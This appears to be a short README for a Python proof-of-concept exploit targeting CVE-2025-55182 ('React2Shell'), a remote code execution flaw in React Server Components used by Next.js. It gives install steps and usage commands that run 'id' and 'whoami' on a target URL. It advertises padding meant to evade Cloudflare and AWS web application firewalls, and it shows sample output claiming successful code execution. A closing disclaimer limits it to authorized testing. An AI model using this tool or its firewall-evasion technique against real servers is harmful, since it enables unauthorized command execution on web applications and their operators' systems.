
Python PoC for CVE-2025-55182 (React2Shell) RCE in Next.js/React Server Components with dynamic WAF bypass padding for authorized security testing.
A clean, reliable Python proof-of-concept exploit for CVE-2025-55182 (aka React2Shell), a critical remote code execution vulnerability in React Server Components used by Next.js (App Router) and similar frameworks.
This PoC includes dynamic WAF bypass padding to evade common web application firewalls (Cloudflare, AWS WAF, etc.) that limit deep inspection of large multipart bodies.
requests librarypip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
This tool is for authorized security testing and research only.